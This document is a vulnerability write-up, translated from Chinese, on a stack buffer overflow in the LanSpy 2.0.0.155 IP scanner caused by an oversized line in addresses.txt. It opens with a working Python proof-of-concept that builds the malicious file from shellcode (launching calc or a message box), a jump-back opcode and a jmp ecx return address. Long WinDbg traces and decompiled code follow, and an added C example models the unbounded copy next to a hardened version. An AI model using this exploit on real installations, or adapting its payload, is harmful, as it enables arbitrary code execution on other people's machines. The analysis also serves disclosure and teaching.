LanSpy 2.0.0.155 Local Code Execution Vulnerability

Author: k0shl. Please credit the source when reposting: https://whereisk0shl.top


Vulnerability Description


LanSpy is an IP scanning tool. When LanSpy starts it loads the addresses from the Address.txt file and then processes them, but during that processing neither the validity nor the length of each Address is checked. If a specially constructed Address file is supplied, the malformed string it contains is passed in at load time, which causes a stack overflow and leads to arbitrary code execution.

Software download:
https://www.exploit-db.com/apps/42114d0f9e88ad76acaa0f145dabf923-lanspy_setup.exe

PoC:

import struct

# 32bit Alphanum-ish shellcodes
# Bad chars detected: 00 2d 20

# MessageBoxA at => 00404D80
msgbox_shellcode = (
        "\x31\xC0\x50\x68"
        "\x70\x77\x6E\x64"
        "\x54\x5F\x50\x57"
        "\x57\x50\x35\xC4"
        "\x80\x80\x55\x35"
        "\x44\xCD\xC0\x55"
        "\x50\xC3"
        )

# WinExec at -> 004EC4FF
calc_shellcode = (
        "\x31\xC0\x50\x68"
        "\x63\x61\x6C\x63"
        "\x54\x5F\x50\x57"
        "\x35\xC3\x4E\xC3"
        "\x55\x35\x3C\x8A"
        "\x8D\x55\x50\xC3"
        )

# Change the shellcode to be used here
scde = calc_shellcode
#scde = msgbox_shellcode

# 126 are the bytes to jmp back with opcode \x74\x80 => ja -80h and it is where our shellcode resides
junk = 'A'*(676-126) 
if len(scde) > 126:
    exit("[e] Shellcode is too big! Egghunter maybe? ;)")

# 0040407D => jmp ecx inside LanSpy
jecx = 'A'*(126-len(scde))+'\x74\x80CC'+struct.pack('<I', 0x0040407D)

# Junk + Shellcode for calc + jump to our first stage jump which jumps to the second stage calc shellcode
payl = junk + scde + jecx

with open("addresses.txt", "wb") as f:
        f.write(payl)
        f.close()

To trigger the vulnerability, run the PoC to generate an address file, replace LanSpy's own file with it, and then open LanSpy.


Vulnerability Analysis


First, construct a malformed Address.txt and swap it in, then open LanSpy. The malformed Address string is loaded directly when LanSpy starts; run a LanSpy scan straight away and the program crashes.

(138.140): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=01e4fc41 ebx=00418d7c ecx=01e4feb0 edx=00000000 esi=00410041 edi=00410041
eip=41414141 esp=01e4feb8 ebp=41414141 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
41414141 ??              ???

At this point eip is already at a controlled position; check the stack backtrace with kb.

0:004> kb
ChildEBP RetAddr  Args to Child              
WARNING: Frame IP not in any known module. Following frames may be wrong.
01e4feb4 41414141 41414141 41414141 41414141 0x41414141
*** WARNING: Unable to verify checksum for C:\Program Files\LanTricks\LanSpy\LanSpy.exe
*** ERROR: Module load completed but symbols could not be loaded for C:\Program Files\LanTricks\LanSpy\LanSpy.exe
01e4ffa0 00404eb6 01e4ffdc 004049e8 01e4ffb4 0x41414141
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\WINDOWS\system32\kernel32.dll - 
01e4ffb4 7c80b713 00b4d2c0 00410041 00410041 LanSpy+0x4eb6
01e4ffec 00000000 00404e8c 00b4d2c0 00000000 kernel32!GetModuleFileNameA+0x1b4

Tracing to 00404eb6, this is a call to the function StartAddress, which is used to start up the address scanning functionality.

int __stdcall StartAddress(LPVOID lpThreadParameter)
{
  int (*v1)(void); // ST00_4@1
  int result; // eax@1
  unsigned int v3; // [sp-Ch] [bp-Ch]@1
  int (*v4)(); // [sp-8h] [bp-8h]@1
  int *v5; // [sp-4h] [bp-4h]@1
  int savedregs; // [sp+0h] [bp+0h]@1

  sub_403F10();
  v5 = &savedregs;
  v4 = sub_4049E8;
  v3 = __readfsdword(0);
  __writefsdword(0, (unsigned int)&v3);
  sub_402B5C(*(_DWORD *)lpThreadParameter, *((_DWORD *)lpThreadParameter + 1));
  result = v1();
  __writefsdword(0, v3);
  return result;
}

result is obtained by calling v1. The value of v1 is something like a virtual-function call, resolved dynamically at runtime, so trace it directly.

0:004> g
Breakpoint 0 hit
eax=00000000 ebx=00b4d2c0 ecx=01e4ff90 edx=004fa5cc esi=00410041 edi=00410041
eip=00404eb2 esp=01e4ffa0 ebp=01e4ffb4 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
LanSpy+0x4eb2:
00404eb2 5a              pop     edx
0:004> p
eax=00000000 ebx=00b4d2c0 ecx=01e4ff90 edx=004245fc esi=00410041 edi=00410041
eip=00404eb3 esp=01e4ffa4 ebp=01e4ffb4 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
LanSpy+0x4eb3:
00404eb3 58              pop     eax
0:004> p
eax=00b6ad18 ebx=00b4d2c0 ecx=01e4ff90 edx=004245fc esi=00410041 edi=00410041
eip=00404eb4 esp=01e4ffa8 ebp=01e4ffb4 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
LanSpy+0x4eb4:
00404eb4 ffd2            call    edx {LanSpy+0x245fc (004245fc)}

This calls the function at 004245fc; step into it.

void __usercall __noreturn sub_4245FC(int a1@<eax>)
{
  char v1; // bl@3
  int v2; // esi@3
  unsigned int v3; // [sp-18h] [bp-28h]@2
  void *v4; // [sp-14h] [bp-24h]@2
  int *v5; // [sp-10h] [bp-20h]@2
  unsigned int v6; // [sp-Ch] [bp-1Ch]@1
  void *v7; // [sp-8h] [bp-18h]@1
  int (*v8)(); // [sp-4h] [bp-14h]@1
  _DWORD *v9; // [sp+Ch] [bp-4h]@1
  int savedregs; // [sp+10h] [bp+0h]@1

  v9 = (_DWORD *)a1;
  v8 = (int (*)())&savedregs;
  v7 = &sub_424692;
  v6 = __readfsdword(0);
  __writefsdword(0, (unsigned int)&v6);
  if ( !*(_BYTE *)(a1 + 13) )
  {
    v5 = &savedregs;
    v4 = &loc_42463D;
    v3 = __readfsdword(0);
    __writefsdword(0, (unsigned int)&v3);
    (*(void (**)(void))(*v9 + 4))();

Later on, this function calls the function at offset 4 of v9. v9 is derived from a1, and a1 is evidently a structure pointer: the byte at a1+13 is tested in an if first, and then the function at offset 4 of a1 is called.

0:004> p
eax=00000000 ebx=00b4d2c0 ecx=01e5ff90 edx=004245fc esi=00410041 edi=00410041
eip=0042462b esp=01e5ff78 ebp=01e5ffa0 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
LanSpy+0x2462b:
0042462b 8b45fc          mov     eax,dword ptr [ebp-4] ss:0023:01e5ff9c=00b6ad18
0:004> p
eax=00b6ad18 ebx=00b4d2c0 ecx=01e5ff90 edx=004245fc esi=00410041 edi=00410041
eip=0042462e esp=01e5ff78 ebp=01e5ffa0 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
LanSpy+0x2462e:
0042462e 8b10            mov     edx,dword ptr [eax]  ds:0023:00b6ad18=004ec838
0:004> p
eax=00b6ad18 ebx=00b4d2c0 ecx=01e5ff90 edx=004ec838 esi=00410041 edi=00410041
eip=00424630 esp=01e5ff78 ebp=01e5ffa0 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
LanSpy+0x24630:
00424630 ff5204          call    dword ptr [edx+4]    ds:0023:004ec83c=004ed9b0

The function called here is 004ed9b0. It is mainly responsible for the post-scan work, including printing the scan information in the GUI. Tracing this function dynamically, the first thing it does is a length check on the value passed in from Address.txt.

0:004> p
eax=00b7400c ebx=00418d7c ecx=00000002 edx=004edda4 esi=00410041 edi=00410041
eip=004edb30 esp=01e5fef8 ebp=01e5ff70 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000212
LanSpy+0xedb30:
004edb30 e893d9f4ff      call    LanSpy+0x3b4c8 (0043b4c8)

0:004> dd eax
00b7400c  41414141 41414141 41414141 41414141
00b7401c  41414141 41414141 41414141 41414141
00b7402c  41414141 41414141 41414141 41414141
00b7403c  41414141 41414141 41414141 41414141
00b7404c  41414141 41414141 41414141 41414141
00b7405c  41414141 41414141 41414141 41414141
00b7406c  41414141 41414141 41414141 41414141
00b7407c  41414141 41414141 41414141 41414141

bool __usercall sub_43B4C8@<al>(int a1@<eax>, int a2@<ecx>, char *a3@<edx>)
{
  return sub_40E290((void *)a2, a3, (char *)a1) > 0;
}

Next, a function call processes the IP address information. IDA cannot turn it into pseudocode; the function is fairly complex and consists mostly of conditional jumps.

0:004> p
eax=00000000 ebx=00418d7c ecx=01e5fee4 edx=004fa5cc esi=00410041 edi=00410041
eip=004edcab esp=01e5fef8 ebp=01e5ff70 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
LanSpy+0xedcab:
004edcab 8b55f8          mov     edx,dword ptr [ebp-8] ss:0023:01e5ff68=00000001
0:004> p
eax=00000000 ebx=00418d7c ecx=01e5fee4 edx=00000001 esi=00410041 edi=00410041
eip=004edcae esp=01e5fef8 ebp=01e5ff70 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
LanSpy+0xedcae:
004edcae 8b45fc          mov     eax,dword ptr [ebp-4] ss:0023:01e5ff6c=00b6ad18
0:004> p
eax=00b6ad18 ebx=00418d7c ecx=01e5fee4 edx=00000001 esi=00410041 edi=00410041
eip=004edcb1 esp=01e5fef8 ebp=01e5ff70 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
LanSpy+0xedcb1:
004edcb1 e8fe000000      call    LanSpy+0xeddb4 (004eddb4)

Next, a series of operations follow whose purpose is to fetch the IP address content from Address.txt and then call inet_addr to convert it.

CODE:004EDE93                 push    eax             ; cp
CODE:004EDE94                 call    inet_addr

Then there is a jump into another loc.

mov     eax, [ebp+var_4]
mov     edx, [eax+0C4h]
mov     eax, [ebp+var_4]
call    sub_4ED04C

A batch of operations run here, after which the function sub_4ED04C is called. The function first assigns its two parameters; edx is the pointer to the malformed string.

0:004> p
eax=00b6ad18 ebx=00418d7c ecx=00000000 edx=00b7400c esi=00410041 edi=00410041
eip=004ed05d esp=01e4fbe8 ebp=01e4feb0 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
LanSpy+0xed05d:
004ed05d 8955f8          mov     dword ptr [ebp-8],edx ss:0023:01e4fea8=ffffffff
0:004> p
eax=00b6ad18 ebx=00418d7c ecx=00000000 edx=00b7400c esi=00410041 edi=00410041
eip=004ed060 esp=01e4fbe8 ebp=01e4feb0 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
LanSpy+0xed060:
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\WINDOWS\system32\WS2_32.dll - 
004ed060 8945fc          mov     dword ptr [ebp-4],eax ss:0023:01e4feac=71a22f3c
0:004> dd edx
00b7400c  41414141 41414141 41414141 41414141
00b7401c  41414141 41414141 41414141 41414141
00b7402c  41414141 41414141 41414141 41414141
00b7403c  41414141 41414141 41414141 41414141
00b7404c  41414141 41414141 41414141 41414141
00b7405c  41414141 41414141 41414141 41414141

Then WSA is initialised in preparation for creating a socket.

CODE:004ED065                 push    ebp
CODE:004ED066                 push    offset loc_4ED1AB
CODE:004ED06B                 push    dword ptr fs:[eax]
CODE:004ED06E                 mov     fs:[eax], esp
CODE:004ED071                 lea     eax, [ebp+WSAData]
CODE:004ED077                 push    eax             ; lpWSAData
CODE:004ED078                 push    101h            ; wVersionRequested
CODE:004ED07D                 call    WSAStartup

Next, the function sub_40a3a4 is called. This step passes the pointer to the malformed string in as the name parameter, and afterwards, at 4ed0b3, gethostbyname is called to get the basic IP address information, with eax being the name pointer, which at this point has already been overwritten by the malformed string. This is where the problem lies: sub_0040a3a4.

0:004> p
eax=01e4fc0c ebx=00418d7c ecx=71a26b63 edx=71a34098 esi=00410041 edi=00410041
eip=004ed0a4 esp=01e4fbd0 ebp=01e4feb0 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
LanSpy+0xed0a4:
004ed0a4 8b55f8          mov     edx,dword ptr [ebp-8] ss:0023:01e4fea8=00b7400c
0:004> p
eax=01e4fc0c ebx=00418d7c ecx=71a26b63 edx=00b7400c esi=00410041 edi=00410041
eip=004ed0a7 esp=01e4fbd0 ebp=01e4feb0 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
LanSpy+0xed0a7:
004ed0a7 e8f8d2f1ff      call    LanSpy+0xa3a4 (0040a3a4)
0:004> p
eax=01e4fc0c ebx=00418d7c ecx=00000000 edx=01e4fc0c esi=00410041 edi=00410041
eip=004ed0ac esp=01e4fbd0 ebp=01e4feb0 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
LanSpy+0xed0ac:
004ed0ac 8d855cfdffff    lea     eax,[ebp-2A4h]
0:004> p
eax=01e4fc0c ebx=00418d7c ecx=00000000 edx=01e4fc0c esi=00410041 edi=00410041
eip=004ed0b2 esp=01e4fbd0 ebp=01e4feb0 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
LanSpy+0xed0b2:
004ed0b2 50              push    eax
0:004> p
eax=01e4fc0c ebx=00418d7c ecx=00000000 edx=01e4fc0c esi=00410041 edi=00410041
eip=004ed0b3 esp=01e4fbcc ebp=01e4feb0 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
LanSpy+0xed0b3:
004ed0b3 e810a5faff      call    LanSpy+0x975c8 (004975c8)  gethostbyname
0:004> dd eax
01e4fc0c  41414141 41414141 41414141 41414141
01e4fc1c  41414141 41414141 41414141 41414141
01e4fc2c  41414141 41414141 41414141 41414141
01e4fc3c  41414141 41414141 41414141 41414141
01e4fc4c  41414141 41414141 41414141 41414141
01e4fc5c  41414141 41414141 41414141 41414141

Let's take a closer look at this function.

int __fastcall sub_40A3A4(int a1, char *a2)
{
  char *v2; // ebx@1
  int v3; // ST00_4@1
  char *v4; // eax@1

  v2 = a2;
  v3 = sub_4051EC(a1);
  v4 = sub_4053EC(v2);
  return sub_40A370(v3, v4);
}

a2 is the pointer to the malformed string. At the return, sub_40a370 is called; this function performs a memcpy-style copy, but without length control.

_BYTE *__usercall sub_40A370@<eax>(_BYTE *result@<eax>, _BYTE *a2@<edx>, int a3@<ecx>)
{
  _BYTE *v3; // edi@1
  int v4; // ebx@1
  bool v5; // zf@1
  unsigned int v6; // ebx@6
  char *v7; // edi@6
  int v8; // ecx@6

  v3 = a2;
  v4 = a3;
  v5 = a3 == 0;
  if ( a3 )
  {
    do
    {
      if ( !a3 )
        break;
      v5 = *v3++ == 0;
      --a3;
    }
    while ( !v5 );
    if ( v5 )
      ++a3;
  }
  v6 = v4 - a3;
  qmemcpy(result, a2, 4 * (v6 >> 2));
  v7 = &result[4 * (v6 >> 2)];
  v8 = v6 & 3;
  qmemcpy(v7, &a2[4 * (v6 >> 2)], v8);
  v7[v8] = 0;
  return result;
}
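The copy routine above, reimplemented as an added example (this is not LanSpy's code) beside a hardened form, plus a toy model of the frame seen in the debugger: the destination at ebp-2A4h is 676 bytes, while the cap in ecx at the call is 0x384 (900), so the routine can write past the buffer into the saved ebp and return address. The struct layout, the slack area and the zero placeholder values are assumptions of the model.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* From the debugger session above: the destination is at ebp-2A4h and ecx,
   the length cap, is 0x384 when sub_40A370 is called, so cap > buffer. */
#define DST_SIZE   0x2A4   /* 676-byte stack buffer */
#define COPY_LIMIT 0x384   /* 900-byte cap passed in ecx */

/* Assumed C equivalent of sub_40A370 (not LanSpy's source): n = strnlen(src,
   limit); memcpy(dst, src, n); dst[n] = 0.  The bound is the caller's limit,
   not the size of dst, so up to limit + 1 bytes are written. */
size_t lanspy_copy(char *dst, const char *src, size_t limit)
{
    size_t n = 0;
    while (n < limit && src[n] != '\0')
        n++;
    memcpy(dst, src, n);
    dst[n] = '\0';
    return n + 1;                       /* bytes written incl. terminator */
}

/* Hardened form: derive the cap from the destination so the terminator always
   lands inside dst; an oversized line is truncated instead of spilling. */
size_t safe_copy(char *dst, size_t dst_size, const char *src, size_t limit)
{
    if (dst_size == 0) return 0;
    return lanspy_copy(dst, src, limit < dst_size ? limit : dst_size - 1);
}

/* Toy model of the vulnerable frame: the buffer, then the saved ebp and the
   return address above it.  slack keeps the spill inside one C object. */
struct frame {
    char     buf[DST_SIZE];
    uint32_t saved_ebp, ret_addr;
    char     slack[512];
};

/* Copies a constructed addresses.txt line of input_len 'A' bytes (the PoC's
   padding) into the model frame and returns the return-address slot:
   0x41414141 means it was overwritten, matching eip=41414141 in the crash. */
uint32_t demo_ret_after_copy(size_t input_len, int use_safe)
{
    static char input[1024];
    struct frame f;
    if (input_len >= sizeof input) input_len = sizeof input - 1;
    memset(input, 'A', input_len);
    input[input_len] = '\0';
    memset(&f, 0, sizeof f);            /* 0 = placeholder original value */
    if (use_safe)
        safe_copy(f.buf, sizeof f.buf, input, COPY_LIMIT);
    else
        lanspy_copy(f.buf, input, COPY_LIMIT);
    return f.ret_addr;
}
```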

Looking at this process, once the copy finishes the malformed string has been copied onto the stack.

0:004> p
eax=01e4fc0c ebx=00b7400c ecx=00000384 edx=00b7400c esi=01e4fc0c edi=00410041
eip=0040a3bf esp=01e4fbc0 ebp=01e4feb0 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
LanSpy+0xa3bf:
0040a3bf e8acffffff      call    LanSpy+0xa370 (0040a370)
0:004> dc esi
01e4fc0c  7ffde000 00000018 7c92118a 00500010  ...........|..P.
01e4fc1c  00000002 01e4fc04 7ffde000 01e4fc94  ................
01e4fc2c  7c92e900 7c9485b0 7ffd9000 01e4fca4  ...|...|........
01e4fc3c  7c955df4 01e4fc68 7c93b197 7ffd9000  .].|h......|....
01e4fc4c  7ffde000 00000000 00000014 00000001  ................
01e4fc5c  00000000 00000000 00000010 00000014  ................
01e4fc6c  00000001 00000000 00000000 00000010  ................
01e4fc7c  7ffd9000 7ffde000 5dd6c1d5 00251ea4  ...........]..%.
0:004> p
eax=01e4fc0c ebx=00b7400c ecx=00000000 edx=01e4fc0c esi=01e4fc0c edi=00410041
eip=0040a3c4 esp=01e4fbc0 ebp=01e4feb0 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
LanSpy+0xa3c4:
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\WINDOWS\system32\WS2_32.dll - 
0040a3c4 890424          mov     dword ptr [esp],eax  ss:0023:01e4fbc0=71a26b63
0:004> dc esi
01e4fc0c  41414141 41414141 41414141 41414141  AAAAAAAAAAAAAAAA
01e4fc1c  41414141 41414141 41414141 41414141  AAAAAAAAAAAAAAAA
01e4fc2c  41414141 41414141 41414141 41414141  AAAAAAAAAAAAAAAA
01e4fc3c  41414141 41414141 41414141 41414141  AAAAAAAAAAAAAAAA
01e4fc4c  41414141 41414141 41414141 41414141  AAAAAAAAAAAAAAAA
01e4fc5c  41414141 41414141 41414141 41414141  AAAAAAAAAAAAAAAA
01e4fc6c  41414141 41414141 41414141 41414141  AAAAAAAAAAAAAAAA
01e4fc7c  41414141 41414141 41414141 41414141  AAAAAAAAAAAAAAAA

After it returns, this step of course fails, and execution enters the error-handling branch.

0:004> p
eax=00000000 ebx=00418d7c ecx=00007a23 edx=00100001 esi=00410041 edi=00410041
eip=004ed0bf esp=01e4fbd0 ebp=01e4feb0 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
LanSpy+0xed0bf:
004ed0bf 0f84b3000000    je      LanSpy+0xed178 (004ed178)               [br=1]
0:004> p
eax=00000000 ebx=00418d7c ecx=00007a23 edx=00100001 esi=00410041 edi=00410041
eip=004ed178 esp=01e4fbd0 ebp=01e4feb0 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
LanSpy+0xed178:
004ed178 33c0            xor     eax,eax

When the function returns, the return address has been overwritten by the earlier memcpy onto the stack: arbitrary code execution. This branch first calls WSACleanup to release the handle from the WSA initialisation, then runs on to the function return; along the way one more call is made.

0:004> p
eax=01e4fc41 ebx=00418d7c ecx=01e4feb0 edx=00000000 esi=00410041 edi=00410041
eip=004ed1b5 esp=01e4fbe8 ebp=01e4feb0 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
LanSpy+0xed1b5:
004ed1b5 8be5            mov     esp,ebp
0:004> p
eax=01e4fc41 ebx=00418d7c ecx=01e4feb0 edx=00000000 esi=00410041 edi=00410041
eip=004ed1b7 esp=01e4feb0 ebp=01e4feb0 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
LanSpy+0xed1b7:
004ed1b7 5d              pop     ebp
0:004> p
eax=01e4fc41 ebx=00418d7c ecx=01e4feb0 edx=00000000 esi=00410041 edi=00410041
eip=004ed1b8 esp=01e4feb4 ebp=41414141 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
LanSpy+0xed1b8:
004ed1b8 c3              ret
0:004> dd esp
01e4feb4  41414141 41414141 41414141 41414141
01e4fec4  41414141 41414141 41414141 41414141
01e4fed4  41414141 41414141 41414141 41414141
01e4fee4  41414141 41414141 41414141 41414141
01e4fef4  41414141 41414141 41414141 41414141